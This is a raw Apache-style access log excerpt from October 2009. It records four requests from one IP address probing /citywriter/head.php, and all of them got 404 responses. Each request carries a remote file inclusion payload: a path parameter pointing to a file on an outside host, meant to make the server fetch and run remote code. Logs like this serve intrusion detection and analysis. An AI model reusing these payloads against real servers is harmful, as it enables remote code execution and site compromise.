94.23.2.21 - - [17/Oct/2009:05:29:48 -0400] "GET /logs//citywriter/head.php?path=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
94.23.2.21 - - [17/Oct/2009:05:29:50 -0400] "GET /logs/access_log.Q109051600//citywriter/head.php?path=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
94.23.2.21 - - [17/Oct/2009:05:29:51 -0400] "GET //citywriter/head.php?path=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
94.23.2.21 - - [17/Oct/2009:05:29:51 -0400] "GET /logs/access_log.Q109091000%20%20//citywriter/head.php?path=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
